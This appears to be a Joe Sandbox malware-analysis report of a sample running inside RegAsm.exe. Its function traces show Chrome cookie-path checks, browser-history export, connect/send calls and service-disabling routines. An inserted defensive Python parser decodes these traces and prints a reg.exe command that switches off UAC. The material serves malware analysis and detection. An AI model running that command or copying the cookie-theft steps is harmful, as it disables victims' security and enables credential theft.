                                                  • API String ID: 3024135584-2418719853
                                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                  • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                  • _free.LIBCMT ref: 0044943D
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00449609
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID:
                                                  • API String ID: 1286116820-0
                                                  • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                  • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                  • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                  • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 4269425633-0
                                                  • Opcode ID: 5013d04b6558d5b24e4612dd319dda4bb727b03e7287b844ebb1e8f149362748
                                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                  • Opcode Fuzzy Hash: 5013d04b6558d5b24e4612dd319dda4bb727b03e7287b844ebb1e8f149362748
                                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
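The call traces in the function listing above carry the behaviour in raw stack values: OpenServiceW with dwDesiredAccess 0x20 or 0x40 followed by ControlService with dwControl 1, 2 or 3 (stop, pause, continue), ChangeServiceConfigW with dwStartType 4 (disabled), the reg.exe command line handed to CreateProcessA that sets EnableLUA to 0, and CreateToolhelp32Snapshot with dwFlags 0x2 ahead of the Process32First/Next walk. The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the analysed sample. It parses lines in the "Func.MODULE(args), ref: ADDR" format printed in the report, decodes the values against the Windows SDK constants (winsvc.h, tlhelp32.h, winbase.h), and flags the interesting calls. The sample trace is constructed by copying lines from the listing; the argument positions assumed are those of the documented API signatures (dwDesiredAccess is the third parameter of OpenServiceW, dwControl the second of ControlService, dwStartType the third of ChangeServiceConfigW, dwCreationFlags the sixth of CreateProcessA, dwFlags the first of CreateToolhelp32Snapshot). Values the sandbox prints beyond a function's real arity are stack residue and are ignored.

```python
import re
from typing import Dict, List, Optional

# Trace line format used in the listing: "Func.MODULE(arg,arg,...), ref: ADDR".
# Arguments are 8-hex-digit stack values, "?" when the sandbox could not resolve them,
# or inline strings (paths, command lines). Calls without arguments omit the parentheses.
TRACE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Windows SDK constants used to read the raw values.
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
SERVICE_ACCESS = {0x02: "SERVICE_CHANGE_CONFIG", 0x10: "SERVICE_START",
                  0x20: "SERVICE_STOP", 0x40: "SERVICE_PAUSE_CONTINUE"}
SERVICE_DISABLED = 4            # dwStartType: service can no longer be started
TH32CS_SNAPPROCESS = 0x2        # CreateToolhelp32Snapshot: snapshot of all processes
CREATE_NO_WINDOW = 0x08000000   # CreateProcess flag: hide the console of the child

# reg.exe writing EnableLUA=0 under Policies\System switches UAC off. Writing HKLM needs
# administrative rights and the change only takes effect after the next reboot.
UAC_DISABLE_RE = re.compile(
    r"Policies\\System\s+/v\s+EnableLUA\s+/t\s+REG_DWORD\s+/d\s+0\b", re.IGNORECASE)

# Constructed sample: trace lines copied from the function listing above.
SAMPLE_TRACE = r"""
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
GetLastError.KERNEL32 ref: 0041D611
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
"""


def parse_call(line: str) -> Optional[Dict]:
    """Parse one trace line; None for lines that are not API calls (headers, hashes)."""
    m = TRACE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    return {"func": m.group("func"), "module": m.group("module"),
            "args": raw.split(",") if raw else [], "ref": m.group("ref")}


def hex_arg(args: List[str], index: int) -> Optional[int]:
    """Argument `index` as an int when it is an 8-digit hex stack value, else None."""
    if index < len(args) and re.fullmatch(r"[0-9A-Fa-f]{8}", args[index]):
        return int(args[index], 16)
    return None


def classify(call: Dict) -> Optional[Dict]:
    """Map one parsed call to a finding, or None when the call is not of interest."""
    f, a = call["func"], call["args"]
    finding = None
    if f in ("CreateProcessA", "CreateProcessW"):
        # lpApplicationName and lpCommandLine are the first two parameters.
        if UAC_DISABLE_RE.search(",".join(a[:2])):
            flags = hex_arg(a, 5) or 0
            hidden = "; CREATE_NO_WINDOW" if flags & CREATE_NO_WINDOW else ""
            finding = ("uac_disable", "EnableLUA=0 via reg.exe" + hidden)
    elif f in ("OpenServiceA", "OpenServiceW"):
        access = hex_arg(a, 2) or 0
        names = [n for bit, n in SERVICE_ACCESS.items() if access & bit]
        if names:
            finding = ("service_open", "|".join(names))
    elif f == "ControlService":
        finding = ("service_control", SERVICE_CONTROL.get(hex_arg(a, 1), "unknown"))
    elif f in ("ChangeServiceConfigA", "ChangeServiceConfigW"):
        if hex_arg(a, 2) == SERVICE_DISABLED:
            finding = ("service_disable", "SERVICE_DISABLED")
    elif f == "CreateToolhelp32Snapshot":
        if (hex_arg(a, 0) or 0) & TH32CS_SNAPPROCESS:
            finding = ("process_enum", "TH32CS_SNAPPROCESS")
    if finding is None:
        return None
    return {"kind": finding[0], "detail": finding[1], "func": f, "ref": call["ref"]}


def analyze_trace(text: str) -> List[Dict]:
    """Run the classifier over every line of a pasted API trace and collect the findings."""
    findings = []
    for line in text.splitlines():
        call = parse_call(line)
        hit = classify(call) if call else None
        if hit:
            findings.append(hit)
    return findings


def summarize(findings: List[Dict]) -> Dict[str, int]:
    """Count findings per kind, the quick view a triage note would carry."""
    counts: Dict[str, int] = {}
    for hit in findings:
        counts[hit["kind"]] = counts.get(hit["kind"], 0) + 1
    return counts


if __name__ == "__main__":
    for hit in analyze_trace(SAMPLE_TRACE):
        print(f'{hit["ref"]} {hit["func"]:<24} {hit["kind"]:<16} {hit["detail"]}')
    print(summarize(analyze_trace(SAMPLE_TRACE)))
```

The decoder is deliberately position-based rather than string-based: the sandbox prints whatever was on the stack, so OpenSCManagerW also shows 0x20 in the third slot, but only the OpenServiceW access mask and the ControlService code together tell you that the three service routines are stop, pause and continue handlers. For the EnableLUA write, the durable host-side indicator is the value itself (HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = 0), which survives the reboot that the change needs in order to take effect.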
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                  • __freea.LIBCMT ref: 0045129D
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                  • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                  • _free.LIBCMT ref: 0044F43F
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                  • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                  • _free.LIBCMT ref: 00448353
                                                  • _free.LIBCMT ref: 0044837A
                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                  • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                  APIs
                                                  • _free.LIBCMT ref: 00450A54
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450A66
                                                  • _free.LIBCMT ref: 00450A78
                                                  • _free.LIBCMT ref: 00450A8A
                                                  • _free.LIBCMT ref: 00450A9C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                  APIs
                                                  • _free.LIBCMT ref: 00444106
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00444118
                                                  • _free.LIBCMT ref: 0044412B
                                                  • _free.LIBCMT ref: 0044413C
                                                  • _free.LIBCMT ref: 0044414D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                  APIs
                                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                                  • _free.LIBCMT ref: 0044E8D5
                                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                  • String ID: *?$.
                                                  • API String ID: 2812119850-3972193922
                                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                  • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                  • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountEventTick
                                                  • String ID: !D@$NG
                                                  • API String ID: 180926312-2721294649
                                                  • Opcode ID: 8a75b7b28f678e250e8660480d12a5fc3fd1b4be0bc449009060b37327f5e913
                                                  • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                  • Opcode Fuzzy Hash: 8a75b7b28f678e250e8660480d12a5fc3fd1b4be0bc449009060b37327f5e913
                                                  • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                  APIs
                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                  • String ID: XQG$NG$PG
                                                  • API String ID: 1634807452-3565412412
                                                  • Opcode ID: e3cbe9e01f77a77e9f2618075dd2463eb662c8aee28ccbe5d1f3042206ea7278
                                                  • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                  • Opcode Fuzzy Hash: e3cbe9e01f77a77e9f2618075dd2463eb662c8aee28ccbe5d1f3042206ea7278
                                                  • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                  • _free.LIBCMT ref: 004435E0
                                                  • _free.LIBCMT ref: 004435EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  • API String ID: 2506810119-1068371695
                                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6C7C8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: /sort "Visit Time" /stext "$0NG
                                                  • API String ID: 368326130-3219657780
                                                  • Opcode ID: 954e782024b67c864ede7c4510563d62e1992c79ce0d6a0ea0cfeeaa97580bb4
                                                  • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                  • Opcode Fuzzy Hash: 954e782024b67c864ede7c4510563d62e1992c79ce0d6a0ea0cfeeaa97580bb4
                                                  • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 00416330
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen$CloseCreateValue
                                                  • String ID: !D@$okmode$PG
                                                  • API String ID: 3411444782-3370592832
                                                  • Opcode ID: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                  • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                  • Opcode Fuzzy Hash: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                  • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                  APIs
                                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                  • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
